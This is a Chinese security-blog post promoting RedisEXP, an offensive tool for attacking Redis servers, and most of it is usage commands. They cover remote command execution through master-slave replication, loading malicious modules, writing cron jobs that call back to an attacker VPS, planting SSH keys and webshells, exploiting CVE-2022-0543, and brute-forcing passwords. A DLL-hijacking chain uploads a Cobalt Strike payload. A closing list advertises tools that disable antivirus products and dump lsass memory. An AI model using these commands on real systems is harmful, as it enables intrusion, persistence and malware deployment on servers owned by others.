点击上方蓝字关注我们
现在只对常读和星标的公众号才展示大图推送,建议大家能把星落安全团队“设为星标”,否则可能就看不到了啦!
工具介绍
工具使用
██████╗ ███████╗██████╗ ██╗███████╗ ███████╗██╗ ██╗██████╗██╔══██╗██╔════╝██╔══██╗██║██╔════╝ ██╔════╝╚██╗██╔╝██╔══██╗██████╔╝█████╗ ██║ ██║██║███████╗ █████╗ ╚███╔╝ ██████╔╝██╔══██╗██╔══╝ ██║ ██║██║╚════██║ ██╔══╝ ██╔██╗ ██╔═══╝██║ ██║███████╗██████╔╝██║███████║ ███████╗██╔╝ ██╗██║╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝ ╚══════╝╚═╝ ╚═╝╚═╝基本连接:RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456执行Redis命令:RedisExp.exe -m cli -r 192.168.19.1 -p 6379 -w 123456 -c info加载dll或so执行命令:RedisExp.exe -m load -r 目标IP -p 目标端口 -w 密码 -rf (目标 dll | so 文件名)RedisEXP.exe -m load -r 127.0.0.1 -p 6379 -rf exp.dll -n system -t system.exec主从复制命令执行:RedisExp.exe -m rce -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port [-c whoami 单次执行] -rf 目标文件名[exp.dll | exp.so (Linux)]RedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoamiRedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoami -rf exp.so主从复制上传文件:RedisExp.exe -m upload -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port -rp 目标路径 -rf 目标文件名 -lf 本地文件RedisEXP.exe -m upload -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -rp . -rf 1.txt -lf .README.md主动关闭主从复制:RedisExp.exe -m close -r 目标IP -p 目标端口 -w 密码写计划任务:RedisExp.exe -m cron -r 目标IP -p 目标端口 -w 密码 -L VpsIP -P VpsPortRedisEXP.exe -m cron -r 192.168.1.8 -p 6379 -L 192.168.1.8 -P 9001写SSH 公钥:RedisExp.exe -m ssh -r 目标IP -p 目标端口 -w 密码 -u 用户名 -s 公钥RedisEXP.exe -m ssh -r 192.168.1.8 -p 6379 -u root -s ssh-aaaaaaaaaaaaaa写webshell:RedisExp.exe -m shell -r 目标IP -p 目标端口 -w 密码 -rp 目标路径 -rf 目标文件名 -s Webshell内容 [base64内容使用 -b 来解码]RedisEXP.exe -m shell -r 127.0.0.1 -p 6379 -rp . -rf shell.txt -s MTIzNA== -bCVE-2022-0543:RedisExp.exe -m cve -r 目标IP -p 目标端口 -w 密码 -c 执行命令爆破Redis密码:RedisExp.exe -m brute -r 目标IP -p 目标端口 -f 密码字典RedisEXP.exe -m brute -r 127.0.0.1 -p 6378 -f pass.txt生成gohper:RedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件执行 bgsave:RedisExp.exe -m bgsave -r 目标IP -p 目标端口 -w 密码判断文件(需要绝对路径):RedisExp.exe -m dir -r 目标IP -p 目标端口 -w 密码 -rf c:windowswin.ini
exp.dll 和 exp.so 来自 https://github.com/0671/RabR 已经把内容分别加载到 dll.go 和 so.go 可以直接调用。
在写入webshell的时候因为有一些特殊字符,可以使用把webshell进行 base64 编码,然后使用 -b 参数来解码
有空格的命令、目录或文件直接使用双引号即可
"ls /"关闭Redis压缩(写入乱码的时候可以关闭压缩,工具在写入shell的时候默认添加了关闭压缩,写入后再恢复开启压缩)config set rdbcompression nostop-writes-on-bgsave-error 默认为 yes, 如果 Redis 开启了 RDB 持久化并且最后一次失败了,Redis 默认会停止写入,让用户意识到数据的持久化没有正常工作。临时的解决方案是 conf set stop-writes-on-bgsave-error 设置为 no,只是让程序暂时忽略了这个问题,但是数据的持久化的问题并没有。(工具会默认设置为 no,等工具退出的时候再重新设置回原来的值yes)config set stop-writes-on-bgsave-error no
dll劫持
上传 cs 马.RedisEXP.exe -m upload -r 127.0.0.1 -p6378 -w 123456 -L 127.0.0.1 -P2222 -rp c:userspublic -rf test.exe -lf artifact.exe上传 dbghelp.dll 到 redis-server.exe 所在目录进行劫持.RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp . -rf dbghelp.dll -lf dbghelp.dll触发dll劫持.RedisEXP.exe -m bgsave -r 127.0.0.1 -p 6378 -w 123456
RedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件config setdir /tmpconfig set dbfilename shell.phpset'webshell''<?php phpinfo();?>'bgsave
工具报错:[ERR Error loading the extension. Please check the server logs.] module load /tmp/exp.so服务端报错:Module/tmp/exp.so failed to load: It does not have execute permissions.
下载地址
圈子介绍
博主介绍:
目前工作在某安全公司攻防实验室,一线攻击队选手。自2022-2024年总计参加过30+次省/市级攻防演练,擅长工具开发、免杀、代码审计、信息收集、内网渗透等安全技术。
目前已经更新的免杀内容:
部分免杀项目源代码
一键击溃360+核晶
一键击溃windows defender
一键击溃火绒进程
CobaltStrike4.9.1二开
CobaltStrike免杀加载器
数据库直连工具免杀版
aspx文件自动上线cobaltbrike
jsp文件自动上线cobaltbrike
哥斯拉免杀工具 XlByPassGodzilla
冰蝎免杀工具 XlByPassBehinder
冰蝎星落专版 xlbehinder
正向代理工具 xleoreg
反向代理工具xlfrc
内网扫描工具 xlscan
CS免杀加载器 xlbpcs
Todesk/向日葵密码读取工具
导出lsass内存工具 xlrls
绕过WAF免杀工具 ByPassWAF
等等...
往期推荐
1.
3
4
5.
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……




还没有评论,来说两句吧...